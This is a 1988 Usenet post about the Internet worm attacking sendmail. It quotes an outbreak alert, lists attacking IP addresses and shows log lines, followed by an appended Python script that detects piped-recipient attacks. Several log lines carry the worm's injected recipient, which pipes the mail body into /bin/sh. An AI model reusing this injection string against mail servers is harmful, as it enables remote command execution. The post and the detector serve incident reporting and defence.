Path: utzoo!attcan!uunet!husc6!mailrus!purdue!decwrl!ucbvax!ETN-WLV.EATON.COM!sms
From: sms@ETN-WLV.EATON.COM (Steven M. Schultz)
Newsgroups: comp.protocols.tcp-ip
Subject: (none)
Message-ID: <8811031657.AA02636@ETN-WLV.EATON.COM>
Date: 3 Nov 88 16:57:19 GMT
Sender: daemon@ucbvax.BERKELEY.EDU
Organization: The Internet
Lines: 40

> From: Peter E. Yee
> Message-Id: <8811030728.AA18199@ames.arc.nasa.gov>
> Subject: Internet VIRUS alert
>
> We are currently under attack from an Internet VIRUS. It has hit UC Berkeley,
> UC San Diego, Lawrence Livermore, Stanford, and NASA Ames. The virus comes in
> via SMTP, and then is able to attack all 4.3BSD and SUN (3.X?) machines. It
> sends a RCPT TO that requests that its data be piped through a shell.
> ...
> -Peter Yee
> yee@ames.arc.nasa.gov
> ames!yee

Before turning off various services I logged attempts from these
addresses:

    128.15.0.76
    26.7.0.102
    128.49.16.91 and
    128.9.1.2

I am still seeing SMTP attempts from 26.7.0.102, the lines in the
sendmail logfile look like this:

    Nov 3 08:26:28 from=, size=1676, class=0
    Nov 3 08:26:35 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,
    Nov 3 08:46:37 from: 26.7.0.102.49412
    Nov 3 08:46:57 message-id=<8811031646.AA02609@ETN-WLV.EATON.COM>
    Nov 3 08:46:57 from=, size=1677, class=0
    Nov 3 08:47:04 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:23,
    Nov 3 08:50:46 from: 26.0.0.58.49924
    Nov 3 08:51:02 message-id=<8811031650.AA02625@ETN-WLV.EATON.COM>
    Nov 3 08:51:02 from=, size=1675,
    Nov 3 08:51:08 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,

Hmmm, there's a new one here - 26.0.0.58. Hadn't seen that one yet.

Steven M. Schultz
sms@etn-wlv.eaton.com
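
Added example, not part of the original post: a log check for the pattern in the excerpt above, flagging any recipient that begins with a pipe and pairing it with the most recent "from:" connection line. Assumptions: the trailing number in "from: 26.7.0.102.49412" is the peer's port, pairing by adjacency is a heuristic because the excerpt shows no queue IDs, and the function names are illustrative.

```python
import re

# Log lines copied from the excerpt in the post above.
SAMPLE_LOG = """\
Nov 3 08:26:28 from=, size=1676, class=0
Nov 3 08:26:35 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,
Nov 3 08:46:37 from: 26.7.0.102.49412
Nov 3 08:46:57 message-id=<8811031646.AA02609@ETN-WLV.EATON.COM>
Nov 3 08:46:57 from=, size=1677, class=0
Nov 3 08:47:04 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:23,
Nov 3 08:50:46 from: 26.0.0.58.49924
Nov 3 08:51:02 message-id=<8811031650.AA02625@ETN-WLV.EATON.COM>
Nov 3 08:51:02 from=, size=1675,
Nov 3 08:51:08 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,
"""

LINE_RE = re.compile(r'^(\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+(.*)$')
# Assumption: "from: a.b.c.d.port" is the peer IPv4 address, then its port.
CONN_RE = re.compile(r'^from:\s+(\d{1,3}(?:\.\d{1,3}){3})\.(\d+)$')
# A recipient starting with "|" asks the mailer to pipe the message to a program.
PIPE_RCPT_RE = re.compile(r'^to=<"?\s*\|(.*?)"?>')

def find_piped_recipients(log_text):
    """Return one dict per piped recipient: time, peer (or None), command."""
    hits, last_peer = [], None
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        stamp, rest = m.groups()
        conn = CONN_RE.match(rest)
        if conn:
            last_peer = conn.group(1)   # remember who connected most recently
            continue
        rcpt = PIPE_RCPT_RE.match(rest)
        if rcpt:
            hits.append({"time": stamp, "peer": last_peer,
                         "command": rcpt.group(1).strip()})
    return hits

def peers(hits):
    """Distinct source addresses seen with a piped recipient."""
    return sorted({h["peer"] for h in hits if h["peer"]})

if __name__ == "__main__":
    for h in find_piped_recipients(SAMPLE_LOG):
        print(h["time"], h["peer"] or "unknown", h["command"])
```

The first hit has no peer because the excerpt begins after that connection's "from:" line.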